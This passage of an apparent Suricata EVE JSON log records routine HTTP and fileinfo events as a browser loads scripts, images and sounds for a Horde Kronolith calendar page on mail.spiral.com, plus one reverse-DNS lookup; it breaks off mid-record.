{"timestamp":"2020-02-29T00:22:32.316886+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046},"app_proto":"http","fileinfo":{"filename":"\/js\/prettyautocomplete.js","state":"CLOSED","stored":false,"size":10406,"tx_id":4}} {"timestamp":"2020-02-29T00:22:32.317655+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376}} {"timestamp":"2020-02-29T00:22:32.325552+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":24731,"tx_id":5}} {"timestamp":"2020-02-29T00:22:32.331346+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401}} {"timestamp":"2020-02-29T00:22:32.332479+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401},"app_proto":"http","fileinfo":{"filename":"\/js\/colorpicker.js","state":"CLOSED","stored":false,"size":12973,"tx_id":6}} {"timestamp":"2020-02-29T00:22:32.332753+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 
rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566}} {"timestamp":"2020-02-29T00:22:32.339316+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24826},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/kronolith.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:22:32.341602+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":50590}} {"timestamp":"2020-02-29T00:22:32.362889+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566},"app_proto":"http","fileinfo":{"filename":"\/js\/form_ghost.js","state":"CLOSED","stored":false,"size":4231,"tx_id":7}} {"timestamp":"2020-02-29T00:22:32.363312+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168}} {"timestamp":"2020-02-29T00:22:32.365078+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688}} {"timestamp":"2020-02-29T00:22:32.365122+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363}} 
{"timestamp":"2020-02-29T00:22:32.366760+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/search-topbar.png","state":"CLOSED","stored":false,"size":363,"tx_id":1}} {"timestamp":"2020-02-29T00:22:32.368121+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/doorbell.wav","state":"CLOSED","stored":false,"size":5168,"tx_id":8}} {"timestamp":"2020-02-29T00:22:32.370139+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/gnid3.wav","state":"CLOSED","stored":false,"size":13688,"tx_id":0}} {"timestamp":"2020-02-29T00:22:32.371064+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776}} {"timestamp":"2020-02-29T00:22:32.409302+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151}} {"timestamp":"2020-02-29T00:22:32.413250+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256}} {"timestamp":"2020-02-29T00:22:32.456633+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/theetone.wav","state":"CLOSED","stored":false,"size":24776,"tx_id":1}} {"timestamp":"2020-02-29T00:22:32.457564+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} {"timestamp":"2020-02-29T00:22:32.458694+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/reminder.wav","state":"CLOSED","stored":false,"size":23151,"tx_id":9}} {"timestamp":"2020-02-29T00:22:32.458965+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292}} {"timestamp":"2020-02-29T00:22:32.459967+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-split.png","state":"CLOSED","stored":false,"size":74,"tx_id":2}} {"timestamp":"2020-02-29T00:22:32.463130+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux 
x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101}} {"timestamp":"2020-02-29T00:22:32.466189+0000","flow_id":1506488481224280,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52962,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:22:32.463757+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/left.png","state":"CLOSED","stored":false,"size":292,"tx_id":10}} {"timestamp":"2020-02-29T00:22:32.464795+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349}} {"timestamp":"2020-02-29T00:22:32.466618+0000","flow_id":381567826925203,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52964,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358}} {"timestamp":"2020-02-29T00:22:32.467428+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/dayview.png","state":"CLOSED","stored":false,"size":349,"tx_id":11}} {"timestamp":"2020-02-29T00:22:32.468297+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-active-bg.png","state":"CLOSED","stored":false,"size":101,"tx_id":3}} {"timestamp":"2020-02-29T00:22:32.467174+0000","flow_id":1879111253891026,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52966,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301}} {"timestamp":"2020-02-29T00:22:32.468392+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:22:32.467975+0000","flow_id":381567826925203,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52964,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/monthview.png","state":"CLOSED","stored":false,"size":358,"tx_id":0}} {"timestamp":"2020-02-29T00:22:32.468862+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/workweekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":12}} {"timestamp":"2020-02-29T00:22:32.470541+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/jetsndb.wav","state":"CLOSED","stored":false,"size":31256,"tx_id":2}} 
{"timestamp":"2020-02-29T00:22:32.471106+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107}} {"timestamp":"2020-02-29T00:22:32.497612+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/buttonbar-bg.png","state":"CLOSED","stored":false,"size":107,"tx_id":3}} {"timestamp":"2020-02-29T00:22:32.497978+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} 
{"timestamp":"2020-02-29T00:22:32.509315+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282}} {"timestamp":"2020-02-29T00:22:32.509535+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560}} {"timestamp":"2020-02-29T00:22:32.509359+0000","flow_id":381567826925203,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52964,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} 
{"timestamp":"2020-02-29T00:22:32.557018+0000","flow_id":1323200751894490,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37972,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32535,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:22:32.582795+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":4}} {"timestamp":"2020-02-29T00:22:32.668240+0000","flow_id":1323200751894490,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37972,"proto":"UDP","dns":{"type":"answer","id":32535,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:32.668240+0000","flow_id":1323200751894490,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37972,"proto":"UDP","dns":{"type":"answer","id":32535,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:22:32.740698+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 